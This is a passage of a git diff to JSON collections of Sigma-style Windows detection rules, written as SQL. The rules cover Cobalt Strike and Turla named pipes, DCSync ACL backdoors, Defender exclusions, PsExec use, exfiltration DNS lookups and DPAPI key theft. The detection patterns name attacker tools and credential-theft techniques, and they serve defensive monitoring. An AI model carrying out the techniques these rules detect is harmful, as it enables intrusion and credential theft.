RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" ], - "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" + "filename": "win_security_petitpotam_network_share.yml" }, { - "title": "Unusual File Deletion by Dns.exe", - "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "title": "Suspicious Scheduled Task Update", + "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "status": "experimental", - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" + "filename": "win_security_susp_scheduled_task_update.yml" }, { - "title": "Prefetch File Deleted", - "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", - "status": "experimental", - "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", - "author": "Cedric MAURUGEON", + "title": "Windows Defender Exclusion Set", + "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "status": "test", + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "author": "@BarryShooshooga", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Intended inclusions by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_prefetch.yml" + "filename": "win_security_defender_bypass.yml" }, { - "title": "Exchange PowerShell Cmdlet History Deleted", - "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "id": "2c99737c-585d-4431-b61a-c911d86ff32f", "status": "experimental", - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "falsepositives": [ + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + ], + "filename": "win_security_account_backdoor_dcsync_rights.yml" + }, + { + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Possible FP during log rotation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "file_delete_win_delete_exchange_powershell_logs.yml" + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" } ] diff --git a/rules/rules_windows_generic_full.json b/rules/rules_windows_generic_full.json index 73cdca9..e216723 100644 --- a/rules/rules_windows_generic_full.json +++ b/rules/rules_windows_generic_full.json @@ -1,710 +1,731 @@ [ { - "title": "DNS Query for MEGA.io Upload Domain - DNS Client", - "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe used by known APT malware", + "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\')" ], - "filename": "win_dns_client_mega_nz.yml" + "filename": "pipe_created_mal_namedpipes.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", - "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "title": "CobaltStrike Named Pipe Pattern Regex", + "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,')" ], - "filename": "win_dns_client__mal_cobaltstrike.yml" + "filename": "pipe_created_mal_cobaltstrike_re.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - DNS Client", - "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", - "status": "experimental", - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADFS Database Named Pipe Connection", + "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "status": "test", + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Processes in the filter condition" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tssdis.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "win_dns_client_anonymfiles_com.yml" + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - DNS Client", - "id": "090ffaad-c01a-4879-850c-6d57da98452d", - "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Named Pipes", + "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "status": "test", + "description": "Detects a named pipe used by Turla group samples", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.g0010", + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\')" ], - "filename": "win_dns_client_ufile_io.yml" + "filename": "pipe_created_apt_turla_namedpipes.yml" }, { - "title": "Query Tor Onion Address - DNS Client", - "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "title": "PowerShell Execution Via Named Pipe", + "id": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", "status": "test", - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE PipeName LIKE '\\\\PSHost%' ESCAPE '\\'" ], - "filename": "win_dns_client_tor_onion.yml" + "filename": "pipe_created_powershell_execution_pipe.yml" }, { - "title": "Protected Storage Service Access", - "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "title": "PAExec Default Named Pipe", + "id": "f6451de4-df0a-41fa-8d72-b39f54a08db5", "status": "test", - "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects PAExec default named pipe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" + "SELECT * FROM logs WHERE PipeName LIKE '\\\\PAExec%' ESCAPE '\\'" ], - "filename": "win_security_protected_storage_service_access.yml" + "filename": "pipe_created_paexec_default_pipe.yml" }, { - "title": "Addition of SID History to Active Directory Object", - "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", - "status": "stable", - "description": "An attacker can use the SID history attribute to gain additional privileges.", - "author": "Thomas Patzke, @atc_project (improvements)", + "title": "CobaltStrike Named Pipe Patterns", + "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", + "status": "test", + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1134.005" + "attack.t1055" ], "falsepositives": [ - "Migration of an account into a new domain" + "Chrome instances using the exact same pipe name \"mojo.something\"" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4765', '4766') OR ((EventID = '4738' AND NOT ((SidHistory LIKE '-' ESCAPE '\\' OR SidHistory LIKE '\\%\\%1793' ESCAPE '\\'))) AND NOT (SidHistory = ''))))" + "SELECT * FROM logs WHERE ((((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" ], - "filename": "win_security_susp_add_sid_history.yml" + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" }, { - "title": "Suspicious Remote Logon with Explicit Credentials", - "id": "941e5c45-cda7-4864-8cea-bbb7458d194a", - "status": "experimental", - "description": "Detects suspicious processes logging on with explicit credentials", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", + "title": "CobaltStrike Named Pipe", + "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "status": "test", + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.t1078", - "attack.lateral_movement" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Administrators that use the RunAS command or scheduled tasks" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4648' AND (ProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\winrs.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')) AND NOT ((TargetServerName = 'localhost') OR (SubjectUserName LIKE '%$' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\')" ], - "filename": "win_security_susp_logon_explicit_credentials.yml" + "filename": "pipe_created_mal_cobaltstrike.yml" }, { - "title": "Account Tampering - Suspicious Failed Logon Reasons", - "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "title": "PsExec Tool Execution From Suspicious Locations - PipeName", + "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", "status": "experimental", - "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.initial_access", - "attack.t1078" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "User using a disabled account" + "Rare legitimate use of psexec from the locations mentioned above" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4625', '4776') AND Status IN ('0xC0000072', '0xC000006F', '0xC0000070', '0xC0000413', '0xC000018C', '0xC000015B')) AND NOT (SubjectUserSid = 'S-1-0-0'))" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_susp_failed_logon_reasons.yml" + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" }, { - "title": "Windows Network Access Suspicious desktop.ini Action", - "id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", - "status": "test", - "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", - "author": "Tim Shelton (HAWK.IO)", + "title": "DiagTrackEoP Default Named Pipe", + "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "status": "experimental", + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.privilege_escalation" ], "falsepositives": [ - "Read only access list authority" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ObjectType = 'File' AND RelativeTargetName LIKE '%\\\\desktop.ini' ESCAPE '\\' AND (AccessList LIKE '%WriteData%' ESCAPE '\\' OR AccessList LIKE '%DELETE%' ESCAPE '\\' OR AccessList LIKE '%WriteDAC%' ESCAPE '\\' OR AccessList LIKE '%AppendData%' ESCAPE '\\' OR AccessList LIKE '%AddSubdirectory%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE PipeName LIKE '%thisispipe%' ESCAPE '\\'" ], - "filename": "win_security_net_share_obj_susp_desktop_ini.yml" + "filename": "pipe_created_diagtrack_eop_default_pipe.yml" }, { - "title": "User Logoff Event", - "id": "0badd08f-c6a3-4630-90d3-6875cca440be", + "title": "EfsPotato Named Pipe", + "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", "status": "experimental", - "description": "Detects a user log-off activity. Could be used for example to correlate information during forensic investigations", - "author": "frack113", + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], "falsepositives": [ "Unknown" ], - "level": "informational", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4634', '4647'))" + "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" ], - "filename": "win_security_user_logoff.yml" + "filename": "pipe_created_efspotato_namedpipe.yml" }, { - "title": "DPAPI Domain Backup Key Extraction", - "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", + "title": "PsExec Default Named Pipe", + "id": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", "status": "test", - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" + "SELECT * FROM logs WHERE 